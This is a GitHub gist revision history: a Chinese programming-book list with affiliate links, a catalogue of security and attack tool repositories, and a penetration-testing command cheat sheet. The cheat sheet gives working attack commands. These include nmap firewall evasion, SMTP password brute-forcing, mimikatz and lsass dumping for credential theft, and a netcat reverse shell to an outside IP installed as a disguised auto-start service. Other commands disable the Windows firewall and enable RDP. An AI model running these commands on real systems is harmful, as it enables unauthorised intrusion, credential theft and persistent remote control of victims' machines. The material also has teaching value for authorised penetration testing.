    * 《[数据挖掘:概念与技术(第3版)](https://www.amazon.cn/gp/product/B007NR0T4A/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B007NR0T4A&linkCode=as2&tag=vastwork-23)》
    * 《[数据挖掘:实用机器学习工具与技术(原书第3版)](https://www.amazon.cn/gp/product/B00K5I91WK/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B00K5I91WK&linkCode=as2&tag=vastwork-23)》
    * 《[大数据:互联网大规模数据挖掘与分布式处理(第2版)](https://www.amazon.cn/gp/product/B011I34CGA/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B011I34CGA&linkCode=as2&tag=vastwork-23)》

    ## Databases

    * 《[SQL应用重构](https://www.amazon.cn/gp/product/B00H6X6M1A/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B00H6X6M1A&linkCode=as2&tag=vastwork-23)》
    * 《[SQL Cookbook](https://www.amazon.cn/gp/product/0596009763/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=0596009763&linkCode=as2&tag=vastwork-23)》
    * 《[高性能MySQL (第3版)](https://www.amazon.cn/gp/product/B00C1W58DE/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B00C1W58DE&linkCode=as2&tag=vastwork-23)》
    * 《深入浅出SQL(中文版)》
    * 《[MySQL技术内幕 : InnoDB存储引擎(第2版)](https://www.amazon.cn/gp/product/B00ETOV48K/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B00ETOV48K&linkCode=as2&tag=vastwork-23)》
    * 《[深入浅出MySQL : 数据库开发、优化与管理维护](https://www.amazon.cn/gp/product/B00KR87J8G/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B00KR87J8G&linkCode=as2&tag=vastwork-23)》

    ## Testing

    * 《[探索式软件测试](https://www.amazon.cn/gp/product/B003JBIV0S/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B003JBIV0S&linkCode=as2&tag=vastwork-23)》
    * 《[有效的单元测试](https://www.amazon.cn/gp/product/B00PVOND2W/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B00PVOND2W&linkCode=as2&tag=vastwork-23)》
    * 《[Google软件测试之道](https://www.amazon.cn/gp/product/B00FH36R6G/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B00FH36R6G&linkCode=as2&tag=vastwork-23)》

    ## Projects and teams

    * 《[人月神话](https://www.amazon.cn/gp/product/B00VR8ZO28/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B00VR8ZO28&linkCode=as2&tag=vastwork-23)》
    * 《[快速软件开发](https://www.amazon.cn/gp/product/B001DBRWL0/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B001DBRWL0&linkCode=as2&tag=vastwork-23)》
    * 《[人件(原书第3版)](https://www.amazon.cn/gp/product/B00MO7R1SG/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B00MO7R1SG&linkCode=as2&tag=vastwork-23)》
    * 《[门后的秘密:卓越管理的故事](https://www.amazon.cn/gp/product/B00CBBKRQ8/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B00CBBKRQ8&linkCode=as2&tag=vastwork-23)》
    * 《[极客与团队:软件工程师的团队生存秘笈](https://www.amazon.cn/gp/product/B00BLZMG8W/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B00BLZMG8W&linkCode=as2&tag=vastwork-23)》

    ## Job interviews

    * 《[程序员面试金典(第5版)](https://www.amazon.cn/gp/product/B00G8VOQOG/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B00G8VOQOG&linkCode=as2&tag=vastwork-23)》
    * 《[编程之美 : 微软技术面试心得](https://www.amazon.cn/gp/product/B00W5269HO/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B00W5269HO&linkCode=as2&tag=vastwork-23)》
    * 《[金领简历:敲开苹果、微软、谷歌的大门](https://www.amazon.cn/gp/product/B00ALPRM7S/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B00ALPRM7S&linkCode=as2&tag=vastwork-23)》
    * 《[剑指Offer:名企面试官精讲典型编程题(纪念版)](https://www.amazon.cn/gp/product/B00L5LKMVU/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B00L5LKMVU&linkCode=as2&tag=vastwork-23)》

    ## Beyond programming

    * 《[暗时间](https://www.amazon.cn/gp/product/B005DSK4W8/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B005DSK4W8&linkCode=as2&tag=vastwork-23)》
    * 《[数学之美](https://www.amazon.cn/gp/product/B00P6OJ09C/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B00P6OJ09C&linkCode=as2&tag=vastwork-23)》
    * 《[赢得朋友](https://www.amazon.cn/gp/product/B00ANY9KZE/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B00ANY9KZE&linkCode=as2&tag=vastwork-23)》
    * 《[精益创业](https://www.amazon.cn/gp/product/B008MIFWJG/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B008MIFWJG&linkCode=as2&tag=vastwork-23)》
    * 《[批判性思维](https://www.amazon.cn/gp/product/B00QPZARMA/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B00QPZARMA&linkCode=as2&tag=vastwork-23)》
    * 《[世界是数字的](https://www.amazon.cn/gp/product/B00M2DKZNA/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B00M2DKZNA&linkCode=as2&tag=vastwork-23)》
    * 《[程序员的数学](https://www.amazon.cn/gp/product/B00A4H3JJS/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B00A4H3JJS&linkCode=as2&tag=vastwork-23)》
    * 《[程序员健康指南](https://www.amazon.cn/gp/product/B00N4LZ6RO/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B00N4LZ6RO&linkCode=as2&tag=vastwork-23)》
    * 《[禅与摩托车维修艺术](https://www.amazon.cn/gp/product/B005O4PUFC/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B005O4PUFC&linkCode=as2&tag=vastwork-23)》
    * 《[关键对话:如何高效能沟通](https://www.amazon.cn/gp/product/B0081M8TZ2/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B0081M8TZ2&linkCode=as2&tag=vastwork-23)》
    * 《[写作法宝:非虚构写作指南](https://www.amazon.cn/gp/product/B00EY8JUBO/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B00EY8JUBO&linkCode=as2&tag=vastwork-23)》
    * 《[黑客与画家 : 来自计算机时代的高见](https://www.amazon.cn/gp/product/B00G1ZT2C0/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B00G1ZT2C0&linkCode=as2&tag=vastwork-23)》
    * 《[软件随想录(卷1)](https://www.amazon.cn/gp/product/B00WDTQU8M/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B00WDTQU8M&linkCode=as2&tag=vastwork-23)》《[软件随想录(卷2)](https://www.amazon.cn/gp/product/B00WFT32FY/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B00WFT32FY&linkCode=as2&tag=vastwork-23)》
    * 《[如何把事情做到最好:改变全球9800万人的人生指导书](https://www.amazon.cn/gp/product/B00ICWNKT6/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B00ICWNKT6&linkCode=as2&tag=vastwork-23)》
  4. Chuanjian Wang revised this gist May 23, 2017. 1 changed file with 189 additions and 0 deletions.
    189 changes: 189 additions & 0 deletions 开源扫描仪的工具箱
    @@ -0,0 +1,189 @@
    Getting started guides

    https://wizardforcel.gitbooks.io/web-hacking-101/content/ Web Hacking 101, Chinese edition
    https://wizardforcel.gitbooks.io/asani/content/ 浅入浅出Android安全 (Android security primer), Chinese edition
    https://wizardforcel.gitbooks.io/lpad/content/ Android 渗透测试学习手册 (Learning Android penetration testing), Chinese edition
    https://wizardforcel.gitbooks.io/kali-linux-web-pentest-cookbook/content/ Kali Linux Web Penetration Testing Cookbook, Chinese edition
    https://github.com/hardenedlinux/linux-exploit-development-tutorial Introduction to Linux exploit development
    https://www.gitbook.com/book/t0data/burpsuite/details Burp Suite practical guide
    http://www.kanxue.com/?article-read-1108.htm=&winzoom=1 Penetration testing Node.js applications
    https://github.com/qazbnm456/awesome-web-security List of web security materials and resources
    https://sec-wiki.com/ sec-wiki security wiki
    Fuzzing tools collection

    https://github.com/ivanfratric/winafl
    https://github.com/attekett/NodeFuzz
    https://github.com/google/oss-fuzz
    http://blog.topsec.com.cn/ad_lab/alphafuzzer/
    http://llvm.org/docs/LibFuzzer.html
    Subdomain enumeration

    https://github.com/lijiejie/subDomainsBrute (classic subdomain brute-force enumeration script)
    https://github.com/ring04h/wydomain (dictionary-based subdomain enumeration)
    https://github.com/le4f/dnsmaper (subdomain enumeration with map plotting)
    https://github.com/0xbug/orangescan (online subdomain information gathering tool)
    https://github.com/TheRook/subbrute (subdomain lookup based on DNS records)
    https://github.com/We5ter/GSDF (subdomain lookup script based on Google's SSL Certificate Transparency logs)
    https://github.com/mandatoryprogrammer/cloudflare_enum (script for subdomain enumeration via CloudFlare)
    https://github.com/18F/domain-scan (A domain scanner)
    https://github.com/guelfoweb/knock (Knock Subdomain Scan)
    https://github.com/Evi1CLAY/CoolPool/tree/master/Python/DomainSeeker (collects target subdomain information through multiple methods)
    https://github.com/code-scan/BroDomain (sibling domain lookup)
    https://github.com/chuhades/dnsbrute (subdomain enumeration based on DNS queries)
    Web application scanners

    http://github.com/Arachni/arachni (web application security scanner framework http://www.arachni-scanner.com)
    Database scanning and injection tools

    https://github.com/sqlmapproject/sqlmap (sqlmap, the king of injection tools)
    https://github.com/0xbug/SQLiScanner (passive SQL injection scanner built on SQLMAP and Charles)
    https://github.com/stamparm/DSSS (SQL injection vulnerability scanner implemented in 99 lines of code)
    https://github.com/youngyangyang04/NoSQLAttack (attack tool targeting MongoDB)
    https://github.com/Neohapsis/bbqsql (blind SQL injection exploitation framework)
    https://github.com/NetSPI/PowerUpSQL (PowerShell script framework for attacking SQL Server)
    https://github.com/WhitewidowScanner/whitewidow (yet another database scanner)
    https://github.com/stampery/mongoaudit (MongoDB auditing and pentesting tool)
    https://github.com/commixproject/commix (command injection exploitation tool)
    Weak password and information leak scanning

    https://github.com/lijiejie/htpwdScan (a simple HTTP brute-force and credential-stuffing script)
    https://github.com/lijiejie/BBScan (a mini batch scanner for information leaks)
    https://github.com/lijiejie/GitHack (exploitation tool for exposed .git directories)
    https://github.com/LoRexxar/BScanner (small dictionary-based directory scanner)
    https://github.com/she11c0der/fenghuangscanner_v3 (port and weak password detection, by wilson9x1; original URL no longer available)
    https://github.com/ysrc/F-Scrack (script for weak password detection across various services)
    https://github.com/Mebus/cupp (script that generates weak-password probe dictionaries from user habits)
    https://github.com/RicterZ/genpAss (weak password generator with Chinese characteristics)
    https://github.com/netxfly/crack_ssh (goroutine-based ssh/redis/mongodb weak password cracking tool written in Go)
    https://github.com/n0tr00t/Sreg (given an email, phone or username, returns all internet account registrations for that user)
    https://github.com/repoog/GitPrey (GitHub sensitive information scanner)
    https://github.com/dxa4481/truffleHog (GitHub sensitive information scanner, including commit history)
    https://github.com/LandGrey/pydictor (brute-force dictionary building tool)
    https://github.com/GDSSecurity/xxe-recursive-download (recursive download tool for XXE vulnerabilities)
    https://buer.haus/xxegen/ (online XXE payload generator)
    IoT device scanning

    https://github.com/rapid7/IoTSeeker (IoT device default password scanner)
    https://github.com/shodan-labs/iotdb (scanning IoT devices with nmap)
    https://github.com/jh00nbr/Routerhunter-2.0 (router vulnerability scanning and exploitation)
    https://github.com/reverse-shell/routersploit (router exploitation framework)
    https://github.com/scu-igroup/telnet-scanner (credential stuffing against telnet services)
    https://github.com/RUB-NDS/PRET (printer attack framework)
    XSS scanning

    https://github.com/shawarkhanethicalhacker/BruteXSS (Cross-Site Scripting Bruteforcer)
    https://github.com/1N3/XSSTracer (A small python script to check for Cross-Site Tracing)
    https://github.com/0x584A/fuzzXssPHP (reflected XSS scanner in PHP)
    https://github.com/chuhades/xss_scan (python script for batch XSS scanning)
    https://github.com/BlackHole1/autoFindXssAndCsrf (browser extension that automatically checks pages for XSS and CSRF vulnerabilities)
    Enterprise network self-assessment

    https://github.com/sowish/LNScan (detailed internal network information scanner)
    https://github.com/SkyLined/LocalNetworkScanner (local network scanner implemented in JavaScript)
    https://github.com/ysrc/xunfeng (network asset identification engine and vulnerability detection engine)
    https://github.com/laramies/theHarvester (script for monitoring sensitive enterprise assets indexed by search engines: employee emails, subdomains, hosts)
    https://github.com/x0day/Multisearch-v2 (aggregated search across search engines, usable for discovering sensitive enterprise assets indexed by search engines)
    Webshell detection and malware analysis tools

    https://github.com/We5ter/Scanners-Box/tree/master/webshell/ (simple PHP backdoor detection tool and webshell sample library)
    https://github.com/ym2011/ScanBackdoor (webshell scanner)
    https://github.com/yassineaddi/BackdoorMan (PHP backdoor scanner)
    https://github.com/he1m4n6a/findWebshell (yet another webshell detection tool)
    https://github.com/Tencent/HaboMalHunter (Habo analysis system: Linux malware analysis and security detection)
    https://github.com/PlagueScanner/PlagueScanner (anti-virus engine written in Python that integrates ClamAV, ESET and Bitdefender)
    https://github.com/nbs-system/php-malware-finder (an efficient PHP webshell scanner)
    https://github.com/emposha/PHP-Shell-Detector/ (webshell detection tool with a tested detection rate of up to 99%)
    Internal network penetration testing toolkits

    https://github.com/0xwindows/VulScritp (enterprise internal network pentest scripts, including banner scanning, port scanning and various generic exploits)
    https://github.com/lcatro/network_backdoor_scanner (internal network reconnaissance framework based on network traffic)
    https://github.com/fdiskyou/hunter (enumerates user logon information via the Windows API)
    https://github.com/BlackHole1/WebRtcXSS (automated XSS-based intrusion into internal networks)
    https://github.com/AlessandroZ/LaZagne (local password retrieval tool)
    https://github.com/huntergregal/mimipenguin (Linux password dumping tool)
    Port scanning, fingerprinting and middleware scanning

    https://nmap.org/download.html (Nmap, the king of port scanners, https://svn.nmap.org/)
    https://github.com/ring04h/wyportmap (target port scanning plus system service fingerprinting)
    https://github.com/ring04h/weakfilescan (dynamic multi-threaded sensitive information leak detection tool)
    https://github.com/EnableSecurity/wafw00f (WAF product fingerprinting)
    https://github.com/rbsec/sslscan (SSL identification)
    https://github.com/urbanadventurer/whatweb (web fingerprinting)
    https://github.com/tanjiti/FingerPrint (web application fingerprinting)
    https://github.com/nanshihui/Scan-T (crawler-style fingerprinting)
    https://github.com/OffensivePython/Nscan (a fast Network scanner inspired by Masscan and Zmap)
    https://github.com/ywolf/F-NAScan (network asset scanning: ICMP liveness probing, port scanning, port service fingerprinting)
    https://github.com/ywolf/F-MiddlewareScan (middleware scanning)
    https://github.com/maurosoria/dirsearch (Web path scanner)
    https://github.com/x0day/bannerscan (class C range banner and path scanning)
    https://github.com/RASSec/RASscan (port service scanning)
    https://github.com/3xp10it/bypass_waf (automated WAF brute-forcing)
    https://github.com/3xp10it/xcdn (attempts to find the real IP behind a CDN)
    https://github.com/Xyntax/BingC (Bing-based class C range / co-hosted site lookup; multi-threaded, API supported)
    https://github.com/Xyntax/DirBrute (multi-threaded web directory brute-forcing tool)
    https://github.com/zer0h/httpscan (a small crawler-style web host discovery tool for network ranges)
    https://github.com/lietdai/doom (distributed IP port vulnerability scanner with task distribution built on thorn)
    https://github.com/chichou/grab.js (fast TCP banner grabbing and parsing tool similar to zgrab, supporting more protocols)
    https://github.com/Nitr4x/whichCDN (CDN identification and detection)
    https://github.com/secfree/bcrpscan (crawler-based web path scanner)
    Targeted vulnerability testing tools

    https://github.com/brianwrf/hackUtils (Java deserialization exploitation toolkit)
    https://github.com/frohoff/ysoserial (Java deserialization exploitation tool)
    https://github.com/blackye/Jenkins (Jenkins vulnerability probing, user enumeration and brute-forcing)
    https://github.com/code-scan/dzscan (Discuz vulnerability scanner)
    https://github.com/chuhades/CMS-Exploit-Framework (CMS attack framework)
    https://github.com/lijiejie/IIS_shortname_Scanner (IIS short filename vulnerability scanner)
    https://github.com/riusksk/FlashScanner (Flash XSS scanner)
    https://github.com/coffeehb/SSTIF (semi-automated tool for server-side template injection vulnerabilities)
    https://github.com/epinna/tplmap (server-side template injection detection and exploitation tool)
    https://github.com/cr0hn/dockerscan (Docker scanning tool)
    https://github.com/GoSecure/break-fast-serial (tool that detects Java deserialization vulnerabilities via DNS resolution)
    https://github.com/dirtycow/dirtycow.github.io (Dirty COW privilege escalation exploit)
    Wireless network pentesting and scanning

    https://github.com/savio-code/fern-wifi-cracker/ (wireless security auditing tool)
    https://github.com/m4n3dw0lf/PytheM (Python network/penetration testing tool)
    https://github.com/P0cL4bs/WiFi-Pumpkin (wireless security penetration testing suite)
    Static code scanning and runtime stack tracing

    https://github.com/exakat/php-static-analysis-tools (PHP static analysis toolset)
    https://github.com/wufeifei/cobra (white-box code security audit system)
    https://github.com/OneSourceCat/phpvulhunter (static PHP code auditing)
    https://github.com/Qihoo360/phptrace (tool for tracing and analysing PHP execution)
    https://github.com/ajinabraham/NodeJsScan (NodeJS application code auditing)
    https://github.com/pwnsdx/BadCode (PHP code auditing)
    https://github.com/thesp0nge/dawnscanner (Ruby source code auditing)
    https://github.com/presidentbeef/brakeman (security vulnerability scanner for Ruby on Rails applications)
    https://github.com/ajinabraham/Mobile-Security-Framework-MobSF/ (mobile app black-box auditing)
    https://github.com/alibaba/iOSSecAudit (iOS security auditing)
    Modular and all-in-one scanners

    https://github.com/az0ne/AZScanner (automated vulnerability scanner: subdomain brute-forcing, port scanning, directory brute-forcing, detection of common framework vulnerabilities)
    https://github.com/blackye/lalascan (distributed web vulnerability scanning framework combining OWASP Top 10 scanning with perimeter asset discovery)
    https://github.com/blackye/BkScanner (BkScanner, a distributed plugin-based web vulnerability scanner)
    https://github.com/ysrc/GourdScanV2 (passive vulnerability scanning)
    https://github.com/alpha1e0/pentestdb (web penetration testing database)
    https://github.com/netxfly/passive_scan (HTTP-proxy-based web vulnerability scanner)
    https://github.com/1N3/Sn1per (automated scanner including middleware scanning and device fingerprinting)
    https://github.com/RASSec/pentestEr_Fully-automatic-scanner (targeted fully automated penetration testing tool)
    https://github.com/3xp10it/3xp10it (automated penetration testing framework)
    https://github.com/Lcys/lcyscan (scanning effectiveness not verified)
    https://github.com/Xyntax/POC-T (plugin-based concurrent penetration testing framework)
    https://github.com/v3n0m-Scanner/V3n0M-Scanner (Scanner in Python3.5 for SQLi/XSS/LFI/RFI and other Vulns)
    https://github.com/Skycrab/leakScan (web-based online vulnerability scanner)
    https://github.com/zhangzhenfeng/AnyScan (under development…)
    Android tools:

    http://sec-redclub.com/index.php/archives/439/
    DDoS protection:

    https://github.com/ywjt/Dshield
    Database firewall:

    https://nim4.github.io/DBShield/
    Open-source WAFs and rule sets:

    https://github.com/xsec-lab/x-waf
    https://github.com/loveshell/ngx_lua_waf
    https://github.com/SpiderLabs/owasp-modsecurity-crs/tree/master/base_rules
  5. @ckeyer ckeyer created this gist May 27, 2016.
    888 changes: 888 additions & 0 deletions 渗透测试工具实战技巧合集
    @@ -0,0 +1,888 @@

    Best NMAP scanning strategy

    # The best nmap scanning strategy for networks of any size

    # Host discovery: generate a list of live hosts
    $ nmap -sn -T4 -oG Discovery.gnmap 192.168.56.0/24
    $ grep "Status: Up" Discovery.gnmap | cut -f 2 -d ' ' > LiveHosts.txt

    # Port discovery: find the most commonly used ports
    # http://nmap.org/presentations/BHDC08/bhdc08-slides-fyodor.pdf
    $ nmap -sS -T4 -Pn -oG TopTCP -iL LiveHosts.txt
    $ nmap -sU -T4 -Pn -oN TopUDP -iL LiveHosts.txt
    $ nmap -sS -T4 -Pn --top-ports 3674 -oG 3674 -iL LiveHosts.txt

    # Port discovery: scan all ports (the UDP scan will be very slow)
    $ nmap -sS -T4 -Pn -p 0-65535 -oN FullTCP -iL LiveHosts.txt
    $ nmap -sU -T4 -Pn -p 0-65535 -oN FullUDP -iL LiveHosts.txt

    # List the open TCP/UDP ports as a comma-separated nmap port spec
    $ grep "open" FullTCP|cut -f 1 -d ' ' | sort -nu | cut -f 1 -d '/' |xargs | sed 's/ /,/g'|awk '{print "T:"$0}'
    $ grep "open" FullUDP|cut -f 1 -d ' ' | sort -nu | cut -f 1 -d '/' |xargs | sed 's/ /,/g'|awk '{print "U:"$0}'

    # Service version detection
    $ nmap -sV -T4 -Pn -oG ServiceDetect -iL LiveHosts.txt

    # Operating system detection
    $ nmap -O -T4 -Pn -oG OSDetect -iL LiveHosts.txt

    # OS and service detection on selected ports
    $ nmap -O -sV -T4 -Pn -p U:53,111,137,T:21-25,80,139,8080 -oG OS_Service_Detect -iL LiveHosts.txt
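The grep/cut/sed/awk pipelines above turn nmap's greppable (-oG) output into a live-host list and a T:/U: port spec. The Python script below is an added example, not part of the original cheat sheet: it does the same parsing in one place and, unlike a plain `grep "open"`, lets you choose whether `open|filtered` (nmap's usual answer for unanswered UDP probes) counts as open. The `-oG` text inside it is constructed, not captured from a real scan.

```python
"""Parse nmap greppable (-oG) output into a live-host list and a port spec.

Added example (not from the original cheat sheet). Works on the "Host:" lines
that -oG writes for both host-discovery (-sn) and port-scan runs. The sample
below is constructed for illustration.
"""
import re

# Constructed sample of what `nmap -sn -oG` / `nmap -sS -oG` write.
SAMPLE_GNMAP = """\
# Nmap 7.70 scan initiated as: nmap -sS -oG - 192.168.56.0/24
Host: 192.168.56.101 ()\tStatus: Up
Host: 192.168.56.101 ()\tPorts: 22/open/tcp//ssh///, 80/open/tcp//http///, 443/closed/tcp//https///\tIgnored State: filtered (997)
Host: 192.168.56.102 ()\tStatus: Up
Host: 192.168.56.102 ()\tPorts: 21/open/tcp//ftp///, 80/open/tcp//http///, 161/open|filtered/udp//snmp///
Host: 192.168.56.103 ()\tStatus: Down
# Nmap done at ...
"""

# One entry of the "Ports:" field: port/state/protocol/...
PORT_RE = re.compile(r"(\d+)/([^/]+)/(tcp|udp)/")


def live_hosts(gnmap_text):
    """Return the sorted hosts reported 'Status: Up' (what the grep|cut pipeline produces)."""
    hosts = set()
    for line in gnmap_text.splitlines():
        if line.startswith("Host:") and "Status: Up" in line:
            hosts.add(line.split()[1])
    return sorted(hosts)


def open_ports(gnmap_text, proto, strict=True):
    """Return sorted unique port numbers for `proto` ('tcp' or 'udp').

    strict=True counts only state 'open'. strict=False also counts
    'open|filtered', which is what a plain `grep "open"` matches as well.
    """
    ports = set()
    for line in gnmap_text.splitlines():
        if not line.startswith("Host:") or "Ports:" not in line:
            continue
        for port, state, p in PORT_RE.findall(line):
            if p != proto:
                continue
            if state == "open" or (not strict and state.startswith("open")):
                ports.add(int(port))
    return sorted(ports)


def port_spec(gnmap_text, strict=True):
    """Build the 'T:22,80,U:161' style spec that the sed/awk pipeline produces."""
    parts = []
    tcp = open_ports(gnmap_text, "tcp", strict)
    udp = open_ports(gnmap_text, "udp", strict)
    if tcp:
        parts.append("T:" + ",".join(map(str, tcp)))
    if udp:
        parts.append("U:" + ",".join(map(str, udp)))
    return ",".join(parts)


if __name__ == "__main__":
    print(live_hosts(SAMPLE_GNMAP))
    print(port_spec(SAMPLE_GNMAP))
    print(port_spec(SAMPLE_GNMAP, strict=False))
```

The resulting spec can be fed straight to `nmap -p` for the follow-up `-sV`/`-O` run, which keeps the service-detection pass limited to ports that actually answered.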
    Nmap: evading firewalls

    # Fragment packets
    $ nmap -f

    # Change the default MTU; the value must be a multiple of 8 (8, 16, 24, 32, ...)
    $ nmap --mtu 24

    # Generate a random number of decoys
    $ nmap -D RND:10 [target]

    # Manually specify the IPs to use as decoys
    $ nmap -D decoy1,decoy2,decoy3 etc.

    # Idle (zombie) scan; a suitable zombie host must be found first
    $ nmap -sI [Zombie IP] [Target IP]

    # Specify the source port number
    $ nmap --source-port 80 IP

    # Append random data to each scan packet
    $ nmap --data-length 25 IP

    # MAC address spoofing; can generate MAC addresses of different vendors
    $ nmap --spoof-mac Dell/Apple/3Com IP
    Web vulnerability scanning with Nmap

    cd /usr/share/nmap/scripts/
    wget http://www.computec.ch/projekte/vulscan/download/nmap_nse_vulscan-2.0.tar.gz && tar xzf nmap_nse_vulscan-2.0.tar.gz
    nmap -sS -sV --script=vulscan/vulscan.nse target
    nmap -sS -sV --script=vulscan/vulscan.nse --script-args vulscandb=scipvuldb.csv target
    nmap -sS -sV --script=vulscan/vulscan.nse --script-args vulscandb=scipvuldb.csv -p80 target
    nmap -PN -sS -sV --script=vulscan --script-args vulscancorrelation=1 -p80 target
    nmap -sV --script=vuln target
    nmap -PN -sS -sV --script=all --script-args vulscancorrelation=1 target
    Directory brute forcing with DIRB

    Note: DIRB is a tool dedicated to brute-forcing directories and is installed by default in Kali. Similar tools include patator, dirsearch and DirBuster abroad and Yujian (御剑) in China.

    dirb http://IP:PORT /usr/share/dirb/wordlists/common.txt
    Patator: all-purpose brute-force testing tool

    # git clone https://github.com/lanjelot/patator.git /usr/share/patator

    # SMTP brute force
    $ patator smtp_login host=192.168.17.129 user=Ololena password=FILE0 0=/usr/share/john/password.lst
    $ patator smtp_login host=192.168.17.129 user=FILE1 password=FILE0 0=/usr/share/john/password.lst 1=/usr/share/john/usernames.lst
    $ patator smtp_login host=192.168.17.129 helo='ehlo 192.168.17.128' user=FILE1 password=FILE0 0=/usr/share/john/password.lst 1=/usr/share/john/usernames.lst
    $ patator smtp_login host=192.168.17.129 user=Ololena password=FILE0 0=/usr/share/john/password.lst -x ignore:fgrep='incorrect password or account name'
    DNS brute forcing with Fierce

    Note: Fierce checks whether the DNS server allows zone transfers. If it does, it performs the transfer and reports the result; if not, it enumerates host names by querying the DNS server. Similar tools: subDomainsBrute, SubBrute, etc.

    # http://ha.ckers.org/fierce/
    $ ./fierce.pl -dns example.com
    $ ./fierce.pl -dns example.com -wordlist myWordList.txt
    Scanning web services with Nikto

    nikto -C all -h http://IP
    Scanning WordPress

    git clone https://github.com/wpscanteam/wpscan.git && cd wpscan
    ./wpscan --url http://IP/ --enumerate p
    HTTP fingerprinting

    wget http://www.net-square.com/_assets/httprint_linux_301.zip && unzip httprint_linux_301.zip
    cd httprint_301/linux/
    ./httprint -h http://IP -s signatures.txt
    Scanning with Skipfish

    Note: Skipfish is a web application security reconnaissance tool. It builds an interactive site map with a recursive crawler and dictionary-based probes, and the final map is annotated with the results of its security checks.

    skipfish -m 5 -LY -S /usr/share/skipfish/dictionaries/complete.wl -o ./skipfish2 -u http://IP
    Scanning with NC

    nc -v -w 1 target -z 1-1000
    for i in {101..102}; do nc -vv -n -w 1 192.168.56.$i 21-25 -z; done
    Unicornscan

    Note: Unicornscan is an information gathering and security auditing tool.

    us -H -msf -Iv 192.168.56.101 -p 1-65535
    us -H -mU -Iv 192.168.56.101 -p 1-65535

    -H  resolve host names during the reporting phase
    -m  scan mode (sf - tcp, U - udp)
    -Iv verbose
    OS fingerprinting with Xprobe2

    xprobe2 -v -p tcp:80:open IP
    Enumerating Samba

    nmblookup -A target
    smbclient //MOUNT/share -I target -N
    rpcclient -U "" target
    enum4linux target
    Enumerating SNMP

    snmpget -v 1 -c public IP
    snmpwalk -v 1 -c public IP
    snmpbulkwalk -v2c -c public -Cn0 -Cr10 IP
    Useful Windows cmd commands

    net localgroup Users
    net localgroup Administrators
    search dir/s *.doc
    system("start cmd.exe /k $cmd")
    sc create microsoft_update binpath="cmd /K start c:\nc.exe -d ip-of-hacker port -e cmd.exe" start= auto error= ignore
    /c C:\nc.exe -e c:\windows\system32\cmd.exe -vv 23.92.17.103 7779
    mimikatz.exe "privilege::debug" "log" "sekurlsa::logonpasswords"
    Procdump.exe -accepteula -ma lsass.exe lsass.dmp
    mimikatz.exe "sekurlsa::minidump lsass.dmp" "log" "sekurlsa::logonpasswords"
    C:\temp\procdump.exe -accepteula -ma lsass.exe lsass.dmp      (32-bit systems)
    C:\temp\procdump.exe -accepteula -64 -ma lsass.exe lsass.dmp  (64-bit systems)
    PuTTY tunnelling

    Forward a remote port to the target address
    plink.exe -P 22 -l root -pw "1234" -R 445:127.0.0.1:445 IP
    Meterpreter port forwarding

    # https://www.offensive-security.com/metasploit-unleashed/portfwd/
    # Forward a remote port to the target address
    meterpreter > portfwd add -l 3389 -p 3389 -r 172.16.194.141
    kali > rdesktop 127.0.0.1:3389
    Enable the RDP service

    reg add "hklm\system\currentcontrolset\control\terminal server" /f /v fDenyTSConnections /t REG_DWORD /d 0
    netsh firewall set service remoteadmin enable
    netsh firewall set service remotedesktop enable
    Disable the Windows firewall

    netsh firewall set opmode disable
    Meterpreter VNC/RDP

    # https://www.offensive-security.com/metasploit-unleashed/enabling-remote-desktop/
    run getgui -u admin -p 1234
    run vnc -p 5043
    Using Mimikatz

    Get Windows plaintext user names and passwords

